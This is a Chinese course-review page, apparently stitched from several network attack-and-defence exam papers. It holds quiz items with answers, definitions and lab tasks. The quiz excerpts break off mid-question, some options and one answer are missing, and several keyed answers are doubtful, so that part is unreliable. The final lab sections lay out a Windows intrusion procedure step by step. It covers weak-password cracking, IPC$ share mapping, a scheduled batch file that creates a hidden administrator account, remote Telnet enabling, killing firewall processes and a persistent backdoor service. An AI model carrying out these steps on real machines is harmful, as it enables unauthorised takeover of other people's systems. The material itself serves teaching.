黑客攻击与预防技术期末复习提纲(含答案)
2020春《网络攻击与防范技术》复习题

2020春《网络攻击与防范技术》复习题一、单项选择题1.传输层的安全协议是:()A.UDPB.ISAKMPC.SSLD.SSH答案:D2.加密在网络上的作用就是防止有价值的信息在网上被()。
A.拦截和破坏B.拦截和窃取C.篡改和损坏D.篡改和窃取答案:D3.下列哪一种网络欺骗技术是实施交换式(基于交换机的网络环境)嗅探攻击的前提? ()A.IP欺骗B.DNS欺骗C.ARP欺骗D.路由欺骗答案:C4.不属于计算机病毒防治的策略的是()。
A.确认手头常备一张真正“干净”的引导盘B.及时、可靠升级反病毒产品C.新购置的计算机软件也要进行病毒检测D.整理磁盘答案:D5.下列哪种攻击方法不属于攻击痕迹清除?()A.篡改日志文件中的审计信息B.修改完整性检测标签C.替换系统的共享库文件D.改变系统时间造成日志文件数据紊乱答案:C6.对企业网络最大的威胁是()。
A.黑客攻击B.外国政府C.竞争对手D.内部员工的恶意攻击答案:D7.在Windows系统中可用来隐藏文件(设置文件的隐藏属性)的命令是()。
A.attribB.dirC.lsD.move答案:A8.常用的公开密钥(非对称密钥)加密算法有()。
A.DESB.SEDC.RSAD.RAS答案:C9.()协议主要用于加密机制。
A.HTTPB.FTPC.TELNETD.SSL答案:D10.下列叙述中正确的是()。
A.计算机病毒只感染可执行文件B.计算机病毒只感染文本文件C.计算机病毒只能通过软件复制的方式进行传播D.计算机病毒可以通过读写磁盘或网络等方式进行传播答案:D11.在下列关于IP数据包中TTL字段的描述中,哪一项是不正确的?()A.TTL(Time To Live)指的是IP数据包在网络上的生存期。
B.TTL值的特性常被用来进行网络路由探测。
C.无论何种操作系统,它们在设计的时候都满足RFC文档的规定,将发送出去的网络数据包中的TTL都设置成一样的值。
网络攻击与防御技术期末考试试卷及答案

网络攻击与防御技术期末考试试卷及答案一、选择题(每题2分,共20分)1. 以下哪项不属于网络攻击的基本类型?A. 服务拒绝攻击B. 网络欺骗攻击C. 网络嗅探攻击D. 信息窃取攻击答案:D2. 以下哪种网络攻击技术不属于拒绝服务攻击(DoS)?A. SYN FloodB. UDP FloodC. HTTP FloodD. SQL Injection答案:D3. 以下哪个网络协议的端口默认未被加密?A. HTTPB. HTTPSD. SSH答案:A4. 以下哪项属于入侵检测系统(IDS)的类别?A. 防火墙B. 入侵容忍系统C. 网络入侵检测系统D. 应用层入侵检测系统答案:C5. 以下哪种加密算法是非对称加密算法?A. AESB. RSAC. DESD. 3DES答案:B6. 以下哪种网络攻击技术属于欺骗攻击?A. SQL InjectionB. Cross-Site Scripting (XSS)C. IP Spoofing答案:C7. 以下哪种网络防御技术不属于防火墙?A. 包过滤B. 状态检测C. 应用层代理D. 数据加密答案:D8. 以下哪种网络攻击技术属于会话劫持?A. Man-in-the-Middle (MitM)B. SQL InjectionC. Cross-Site Scripting (XSS)D. DDoS答案:A9. 以下哪种安全机制属于访问控制?A. 加密B. 认证C. 授权D. 审计10. 以下哪种网络攻击技术属于网络嗅探攻击?A. ARP欺骗B. IP欺骗C. DNS欺骗D. SYN Flood答案:A二、填空题(每题2分,共20分)1. 网络攻击的主要目的是______、______和______。
答案:窃取信息、破坏系统、干扰通信2. 拒绝服务攻击(DoS)的目的是使目标系统______。
答案:无法提供服务3. 防火墙按照工作层次可以分为______、______和______。
网络攻击与防御技术期末考试试卷及答案

网络攻击与防御技术期末考试试卷及答案考试时间: 120 分钟试卷页数(A4): 2 页考试方式:闭卷(开卷或闭卷)考试内容:一、选择题(每小题1分,共30分)1、假冒网络管理员,骗取用户信任,然后获取密码口令信息的攻击方式被称为()。
A、密码猜解攻击B、社会工程攻击C、缓冲区溢出攻击D、网络监听攻击2、下列哪一项软件工具不是用来对网络上的数据进行监听的?()A、XsniffB、TcpDumpC、SniffitD、UserDump3、在进行微软数据库(Microsoft SQL Database)口令猜测的时候,我们一般会猜测拥有数据库最高权限登录用户的密码口令,这个用户的名称是()?A、adminB、administratorC、saD、root4、常见的Windows NT系统口令破解软件,如L0phtCrack(简称LC),支持以下哪一种破解方式?()A.字典破解B、混合破解C、暴力破解D、以上都支持5、著名的John the Ripper软件提供什么类型的口令破解功能? ()A、Unix系统口令破解B、Windows系统口令破解C、邮件帐户口令破解D、数据库帐户口令破解6、下列哪一种网络欺骗技术是实施交换式(基于交换机的网络环境)嗅探攻击的前提? ()A、IP欺骗B、DNS欺骗C、ARP欺骗D、路由欺骗7、通过TCP序号猜测,攻击者可以实施下列哪一种攻击?()A、端口扫描攻击B、ARP欺骗攻击C、网络监听攻击D、TCP会话劫持攻击8、目前常见的网络攻击活动隐藏不包括下列哪一种?()A、网络流量隐藏B、网络连接隐藏C、进程活动隐藏D、目录文件隐藏9、在Windows系统中可用来隐藏文件(设置文件的隐藏属性)的命令是()。
A、dirB、attribC、lsD、move10、在实现ICMP协议隐蔽通道,常需要将发送出去的数据包伪装成下列哪一种类型?()A、ICMP请求信息,类型为0x0B、ICMP请求信息,类型为0x8C、ICMP应答信息,类型为0x0D、ICMP应答信息,类型为0x811、Unix系统中的last命令用来搜索____来显示自从文件创建以来曾经登录过的用户,包括登录/退出时间、终端、登录主机IP地址。
网络安全期末复习提纲

网络安全期末复习提纲1、重点掌握:windows默认共享。
2、重点掌握:对称加密和非对称加密实现机制。
3、重点掌握:ARP和ARP欺骗。
4、重点掌握:SYN Flood DOS/DDOS攻击技术。
5、重点掌握:MD5等常见的HASH(哈希)函数:记住名称。
6、重点掌握:SQL注入攻击与NBSI软件的使用。
7、重点掌握:扫描器的功能。
8、重点掌握:数字签名的实现机制。
9、重点掌握:客户机访问某网站服务器(即WWW服务器),嗅探器抓捕到的数据包分析。
10、重点掌握:端口和端口号。
11、重点掌握:ARP命令功能、参数及具体用法。
12、重点掌握:查看本机端口的命令。
13、重点掌握:IP地址的分类,子网掩码及其功能。
14、重点掌握:远程登录及命令的使用。
15、重点掌握:加密解密的基本原理。
16、重点掌握:以太数据包通过路由器转发的机制和数据包中IP地址、数据帧中MAC地址的变化17、重点掌握:CA含义和功能。
18、重点掌握:PKI含义。
19、一般掌握:主要“远程控制软件”的使用。
20、一般掌握:PGP软件功能及应用。
21、一般掌握:VPN的功能,windowsXP、windows2003中如何架设服务器。
22、一般掌握:IPC$连接的建立及应用。
23、一般掌握:windows组策略中“安全访问”项的设置对ipc$连接共享命令的影响。
24、一般掌握:Sniffer pro软件的功能和使用。
25、了解:木马及其危害。
26、了解:cisco PIX防火墙。
27、了解:入侵检测系统(IDS)和snort软件。
28、了解:交换机的访问控制列表(ACL)和简单配置命令。
网络攻防期末考试试题及答案

网络攻防期末考试试题及答案一、选择题(每题2分,共20分)1. 网络攻击的主要目的不包括以下哪一项?A. 窃取信息B. 破坏系统正常运行C. 增强网络安全D. 进行网络诈骗答案:C2. 以下哪个不是常见的网络攻击手段?A. 钓鱼攻击B. 拒绝服务攻击(DoS)C. 社交工程D. 网络优化答案:D3. 什么是网络防火墙的主要功能?A. 提供网络加速服务B. 阻止未授权访问C. 提供网络存储服务D. 增强网络带宽答案:B4. 在网络安全中,以下哪个协议用于加密数据传输?A. HTTPB. FTPC. HTTPSD. SMTP答案:C5. 以下哪个不是常见的网络防御措施?A. 安装防病毒软件B. 定期更新系统补丁C. 禁用所有网络连接D. 使用VPN进行远程访问答案:C6. 什么是入侵检测系统(IDS)的主要作用?A. 阻止所有网络流量B. 检测并响应可疑活动C. 增强网络带宽D. 管理网络设备答案:B7. 以下哪个是网络钓鱼攻击的典型特征?A. 要求用户下载安全更新B. 通过电子邮件发送可疑链接C. 提供免费的网络服务D. 强制用户更改密码答案:B8. 什么是VPN的主要功能?A. 提供网络加速服务B. 保护数据传输安全C. 管理网络设备D. 增强网络带宽答案:B9. 什么是DDoS攻击?A. 拒绝服务攻击B. 分布式拒绝服务攻击C. 数据驱动攻击D. 动态域名服务攻击答案:B10. 什么是SSL证书的主要作用?A. 验证网站的真实性B. 提高网站访问速度C. 管理网站内容D. 阻止恶意软件答案:A二、简答题(每题5分,共30分)1. 请简述什么是网络钓鱼攻击,并给出防范措施。
答案:网络钓鱼攻击是一种网络诈骗手段,攻击者通过伪装成可信赖的实体,诱使受害者泄露敏感信息,如用户名、密码、信用卡详情等。
防范措施包括:不点击可疑链接,不向未经验证的网站提供个人信息,使用防病毒软件和防钓鱼工具。
2. 描述什么是社交工程攻击,并给出防范方法。
攻防技术基础复习资料

攻防技术基础复习资料网络攻防技术是信息安全领域中的重要学科之一,其研究内容主要是关于计算机网络系统的安全性,以及如何避免网络安全风险和网络攻击。
攻防技术基础知识对于信息安全人员和计算机网络专业的学生来说是非常重要的,本篇文章将针对攻防技术的基础知识进行复习资料的整理。
一、网络架构和协议网络架构是攻防技术的基础,对于网络架构的理解,有助于更深入理解攻防技术的应用。
网络架构分为三个层次,即应用层、传输层和网络层。
其中,应用层主要涉及网络应用协议,例如HTTP协议、FTP协议;传输层主要涉及TCP和UDP协议;而网络层则是涉及到IP协议。
此外,在具体应用时,还需要了解其他协议,例如:DNS协议、ICMP协议、ARP协议等等。
攻击者往往会利用这些协议的漏洞发动网络攻击,因此对协议的理解和掌握是非常重要的。
二、加密技术加密技术是信息安全领域中常用的技术手段。
在网络通信中,常用的加密技术有对称加密和非对称加密。
其中,对称加密是指加密和解密用的是同一个密钥,常用的有DES、AES等;而非对称加密则是指加密和解密用的是不同的密钥,常用的有RSA等。
此外,数字签名也是加密技术的一部分,它可以对信息进行认证和保护。
数字签名采用非对称加密技术,可以有效地防止信息被篡改。
同时,数字证书也是数字签名技术的重要组成部分,它可以对实体进行身份验证和授权。
三、入侵检测和防御技术入侵检测技术可以分为主机入侵检测和网络入侵检测两种类型。
主机入侵检测主要直接检测主机内部的攻击和异常行为,例如通过检测系统日志记录、文件目录变更等;而网络入侵检测则检测网络中的攻击行为,例如登录失败、端口扫描等。
目前,常用的主机入侵检测软件有Tripwire、AIDE,而常用的网络入侵检测软件有Snort、Suricata等。
防御技术主要分为被动防御和主动防御两种。
被动防御包括防火墙、入侵检测和反病毒软件等;而主动防御则包括流量清洗、黑客陷阱等。
目前,很多防御技术都采用机器学习、人工智能等先进技术进行处理,以提高自身的安全性。
黑客攻防考试复习资料

2、简述三次握手的过程:3、下图第四步传输什么内容:答:前三步是三次握手过程,第四步是请求的具体内容,比如网页,前三步是为第四步服务的。
4、简述肉鸡的含义。
肉鸡就是通过漏洞完全被黑客控制的计算机,黑客利用它来对目标机器进行攻击的中间代理。
一般安全防范较低。
5、什么叫端口扫描,其目的是什么?A、扫描通过选用远程TCP/IP不同的端口的服务,并记录目标给予的回答,通过这种方法,可以搜集到很多关于目标主机的各种有用的信息(比如:是否能用匿名登陆!是否有可写的FTP目录,是否能用TELNET)B、目的是获取被扫描机器上有用的敏感信息便于黑客攻击。
6、TCP/IP的全称是什么?传输控制协议和网络互联协议8、解释后门帐号。
所谓后门账号就是黑客在离开之前,留下便于下次再来该系统的用户账号,9、简述服务端和客户端的关系?客户端是相对于服务端而言的,是用来向服务端提出请求,而后由服务端应答并完成请求的动作,最后服务端将执行结果返回给客户端。
他们分别是请求申请和应答请求。
10、简述根目录的含义?根目录是指逻辑驱动器的最上一级目录,它是相对子目录来说的。
打开“我的电脑”,双击C 盘就进入C盘的根目录,双击D盘就进入D盘的根目录。
一般用反斜杠\表示。
其它类推。
11、绝对路径的含义?是从盘符开始的形如C:\windows\system32\cmd.exe这样的路径。
12、下图是arp命令执行的结果,请简述arp表的含义?这张表是ip地址到mac地址的映射,例如192.168.1.1这台机器的mac地址在本机的缓存里有最新条目的mac地址00-00-04-78-54-98,通过这一条目就可以找到这台机器的物理地址,向其发包,不需要在询问查询该机器的物理地址。
表的最后一列表示这一映射的类型是静态的还是动态的。
13、简述踩点的含义?踩点就是获取目标机器有用的信息,比如:账号,密码,系统类型,ip地址,开放的服务等等。
踩点的作用:收集有用信息,比如:域名,内部网络,外部网络,网关,操作系统。
网络攻防实战复习 题集附答案

网络攻防实战复习题集附答案一、选择题1. 网络攻击的目的通常是:A. 破坏数据B. 获取机密信息C. 影响网络性能D. 扩散病毒答案:B. 获取机密信息2. 下面哪种网络攻击是通过发送无效、大量数据包来占用网络带宽的?A. DDoS攻击B. 木马攻击C. 拒绝服务攻击D. 钓鱼攻击答案:C. 拒绝服务攻击3. 以下哪个选项对于确保网络安全最为重要?A. 使用强密码B. 定期备份数据C. 安装防火墙D. 增加网络带宽答案:A. 使用强密码4. 下列哪项是网络防御的最佳实践之一?A. 定期更新操作系统B. 禁用防火墙C. 分享账户密码D. 在公共WiFi上浏览互联网答案:A. 定期更新操作系统5. 当网络遭受到攻击时,以下哪一个应急措施是最重要的?A. 断开与互联网的连接B. 重启服务器C. 备份受影响的数据D. 删除恶意软件答案:A. 断开与互联网的连接二、判断题1. 防火墙可以预防网络攻击。
答案:正确2. 钓鱼攻击是指利用虚假邮件或网站来欺骗用户输入个人信息。
答案:正确3. 黑客攻击通常是为了破坏数据完整性。
答案:错误4. 加密是一种重要的网络防御手段,可以保护数据的机密性。
答案:正确5. 强密码应包含字母、数字和特殊字符混合使用。
答案:正确三、简答题(请简要回答)1. 简要解释什么是网络攻击。
答案:网络攻击是指通过利用计算机网络漏洞,对网络系统进行未经授权的访问或者对网络资源进行破坏、窃取或篡改的行为。
2. 简述网络防御的重要措施。
答案:网络防御的重要措施包括:使用强密码、定期更新操作系统和应用程序、安装防火墙和杀毒软件、备份关键数据、培训员工网络安全意识等。
3. 举例两种常见的网络攻击类型,并简要描述其特点。
答案:DDoS攻击是一种常见的网络攻击类型,通过同时向目标服务器发送大量请求,占用其网络带宽,导致服务不可用。
钓鱼攻击是通过发送虚假的电子邮件或网站,诱使用户输入个人敏感信息,以便攻击者获取这些信息并进行非法活动。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
(1)网络安全:所谓“网络安全”,是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭到破坏、更改、泄露,系统可以连续可靠正常地运行,网络服务不被中断。
(2)黑客:原指热心于计算机技术,水平高超的电脑专家,尤其是程序设计人员。
但到了今天,黑客一词已被用于泛指那些专门利用电脑网络搞破坏或恶作剧的家伙。
对这些人的正确英文叫法是Cracker,有人翻译成“骇客”。
(3)扫描器:提供了扫描功能的软件工具。
(4)端口:端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。
端口是通过端口号来标记的,端口号只有整数,范围是从0 到65535。
端口可以看成是电脑与外界网络连接的一个门口。
(5)拒绝服务攻击:指终端或者完全拒绝对合法用户、网络、系统和其他资源的服务的攻击方法,其意图就是彻底破坏,这也是比较容易实现的攻击方法。
(6)病毒:计算机病毒是指编制或者在计算机程序中插入的破坏计算机功能或数据,影响计算机使用并且能够自我复制的一组指令或者程序代码。
(7)木马:木马是指潜伏在计算机中,受外部用户控制,以窃取计算机信息或者获取计算机控制权为目的的恶意程序。
(8)防火墙:防火墙是一项协助确保信息安全的设备,会依照特定的规则,允许或是限制传输的数据通过。
防火墙可以是一台专属的硬件也可以是架设在一般硬件上的一套软件。
(9)TCP/IP协议:传输控制协议/因特网互联协议,又名网络通讯协议,是Internet 最基本的协议、Internet国际互联网络的基础,由网络层的IP协议和传输层的TCP协议组成。
(10)IPC$:IPC是英文Internet Process Connection的缩写,即:命名管道,它是windows提供的一个通信基础,用来在两台计算机进程之间建立通信连接,而IPC后面的$是windows系统所使用的隐藏符号,因此IPC$表示IPC共享,但是是隐藏的共享。
默认IPC是共享的。
1、简答题:1)目前常见的网络攻击方式有哪几种类?答:(1)窃听:指攻击者通过非法手段对系统活动的监视从而获得一些安全关键信息。
(2)欺骗:指攻击者通过冒充正常用户以获取对攻击目标访问权或获取关键信息的攻击方法。
(3)拒绝服务:指终端或者完全拒绝对合法用户、网络、系统和其他资源的服务的攻击方法,其意图就是彻底破坏,这也是比较容易实现的攻击方法。
(4)数据驱动攻击:通过向某个程序发送数据,以产生非预期结果的攻击。
2)信息收集的方法分哪几种?答:(1)搜索引擎:搜索引擎是自动从因特网收集信息,经过一定整理以后,提供给用户进行查询的系统。
它包括信息搜集、信息整理和用户查询三部分。
(2)域名解析:域名到IP地址的转换过程。
(3)路由跟踪:路由跟踪就是从本地开始到达某一目标地址所经过的路由设备,并显示出这些路由设备的IP、连接时间等信息。
3)主机发现技术分哪几种?各有什么优缺点?答:(1)ping扫描:确定哪些机器是up的。
有2种方式:ICMP:类似于ping,发送icmp消息给目标,看是否有返回;TCP ping:给目标特定的tcp端口(如常用的80)发送ack消息,如果返回rst,说明机器up。
常用的tracetcp。
(2)ARP扫描:ARP(Address Resolution Protocol)即地址解析协议,它是用于局域网内的物理地址。
ARP扫描是指通过向目标主机发送ARP请求(查询目标主机的物理地址),如果目标主机回应一个ARP响应报文,则说明它是存活的。
(3)端口扫描:判断目标主机开启了哪些端口及其对应的服务;确定目标系统正在运行的TCP/UDP服务;在扫描时希望隐藏自己。
4)入侵者获取远程主机的管理员密码的主要手段有哪些?答:(1)猜测攻击(2)网络嗅探(sniffer) (3)字典攻击(4)键盘记录(5)穷举攻击(6)中间人攻击(7)混合攻击(8)社会工程学(9)直接破解系统口令文件5)简述防范Telnet入侵的方法。
答:(1)保证账号密码的强壮性,防止被暴力破解。
(2)禁用Telnet服务。
(3)关闭IPC$。
(4)安装网络防火墙。
6)Windows系统漏洞主要有哪几类?试各列举两种。
答:(1)本地提权类漏洞:入侵者用非管理员权限账号登录远程主机后,为了完全控制远程主机,需要提升权限所利用的漏洞。
例:Microsoft Windows内核消息处理本地缓冲区溢出漏洞;Microsoft OLE和COM远程缓冲区溢出漏洞。
(2)用户交互类漏洞:入侵者若想成功利用此类漏洞,必需远程主机的使用者打开并运行指定的漏洞利用文件。
例:Microsoft Windows图形渲染引擎安全漏洞。
(3)远程溢出类漏洞:存在此类漏洞,可使用特定的溢出工具对其进行溢出攻击,而不需要与远程主机的使用者进行交互,也不需要提前登录到远程系统上。
例:RPC接口远程任意代码可执行漏洞。
7)使用“计算机管理”可以实现哪些操作?有什么条件限制?答:可以实现的操作:(1)监视系统事件(2)创建和管理共享(3)启动和停止系统服务(4)查看连接到本地或远程计算机的用户列表(5)设置存储设备的属性(6)查看设备配置和添加新设备驱动程序(7)管理服务器应用程序和服务限制的条件:必须是Administrators组的成员才能完全使用。
8)计算机木马具有什么特点和功能?答:(1)特点:属于客户/服务模式。
客户端:主控端,向服务器发送连接请求。
服务端:被控端,提供服务,一般会打开一个默认端口进行监听,当侦听到客户端的连接请求,便自动运行相应程序。
(2)主要功能:文件操作、窃取信息(账号、密码等)、远程控制。
9)简述计算机木马的工作原理。
答:实际上是包含有服务器端和客户端的一套程序。
服务器端程序驻留在目标计算机里,随着系统启动而自行启动。
此外,使用传统技术的程序会在某端口进行监听,若接收到数据就对其进行识别,然后按照识别后的命令在目标计算机上执行一些操作(比如窃取口令,拷贝或删除文件,或重启计算机等)。
10)简述如何防御基于木马的入侵。
答:(1)显示文件扩展名(2)不打开任何可疑文件、文件夹和网页(3)升级IE (4)常开病毒防火墙(5)常开网络防火墙11)简述手功清除木马的基本步骤,以清除“灰鸽子”木马为例。
答:清除灰鸽子要在安全模式下操作,主要有两步:(1)清除灰鸽子的服务:清除灰鸽子的服务一定要在注册表里完成。
1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。
),打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。
2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。
3、删除整个Game_Server项。
(2)删除灰鸽子程序文件删除灰鸽子程序文件非常简单,只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。
至此,灰鸽子已经被清除干净。
2、操作分析题:1)有一系统主机(虚拟机系统),完成系统入侵的操作:a)利用扫描工具,对目标主机进行端口和漏洞扫描、弱口令破解,指出系统存在哪些漏洞,可以用哪些方法进行入侵?(要求把扫描结果截屏)b)利用系统的弱口令漏洞,进行IPC$入侵,把目标机C盘映射为本地Z盘,并建立后门帐户(具有管理员权限)。
(要求把有关操作的过程加以说明,并把关键提示或结果进行截屏)c)说明目标主机应该如何防范本次入侵?PS:入侵方法和步骤:1)获取目标主机管理员账号和密码;(Xscan等)2)建立IPC$连接使用命令:net use \\IP\IPC$ “密码”/user: “账号”3)映射磁盘使用命令:net use z: \\IP\c$4)可以对远程主机进行文件操作了!5)留后门账号A、建立批处理文件hack.batNet user sysbak 123456 /addNet localgroup administrators sysbak /addB、拷贝文件到目标主机使用命令:copy file \\ip\pathC、查看目标主机时间使用命令:net time \\ipD、通过计划任务使远程主机执行hack.bat文件使用命令:at \\ip time hack.batE、验证账号是否建立成功先用net use * /del断开IPC$连接,再用后门账号进行重新连接。
防范:(1)关闭ipc$共享(2)禁止Lanmanserver服务(3)禁止NetLogon (4)禁止NBT(关闭139端口)(5)防火墙屏蔽139和445端口2)有一系统主机(虚拟机系统),完成系统入侵的操作:a)利用扫描工具,对目标主机进行端口和漏洞扫描、弱口令破解,指出系统存在哪些漏洞,可以用哪些方法进行入侵?(要求把扫描结果截屏)b)利用系统的弱口令漏洞,进行Telnet入侵,并建立后门帐户(具有管理员权限)。
(要求把有关操作的过程加以说明,并把关键提示或结果进行截屏)c)说明目标主机应该如何防范本次入侵?PS:使用Telnet登录方法:登录命令:Telnet HOST [PORT]断开:EXITTelnet典型入侵步骤建立IPC$连接→开启Telnet服务→去掉NTLM验证(一般都是输入1)→登录<NTLM认证方式>:0:不使用NTLM身份认证1:先尝试NTLM身份认证,如果失败再使用用户名密码2:只使用NTLM身份认证(xp里面)Telnet登录步骤:1、获取帐号和密码2、获取远程主机的IP地址(甚至端口)3、Telnet HOST [PORT]登录(默认是23端口)4、进行具体操作(详见《实战详解》P24~28)注:有关命令关机shotdown –s –f重启shotdown –r –f思路2:使用工具Opentelnet是国内高手编写的程序,包含两个工具,OpenTelnet.exe是用来启动远程服务器的Telnet的,Resumetelnet.exe是用来把修改了的配置都返回到默认配置上去,关闭Telnet服务。
(要先打开软件的目录:所在的盘符;dir;然后cd OpenTelnet);格式:OpenTelnet.exe \\server(也就是ip) <帐号> <密码> <NTLM认证方式> <Telnet端口>;exit退出将解压opentelnet得文件放在c盘,运行cmd,进入c盘(c:)(要先打开软件的目录:所在的盘符;dir;然后cd OpenTelnet),输入OpenTelnet.exe \\目标ip 账户密码 1 端口号2、入侵过程1)X-Scan扫描弱口令主机2)用Opentelnet打开远程主机Telnet服务(或计算机管理)3)建立IPC$连接,把所需文件拷贝到远程主机(Instsrv.exe、shutdown.exe等)4)Telnet登录5)查看和杀死防火墙进程6)建立Telnet后门(利用Instsrv.exe建立新服务SYSHEALTH,指向Telnet 服务程序C:\WINNT\System32\tlntsvr.exe,这样,即使远程主机Telnet服务被禁用,都可以进行远程登录了。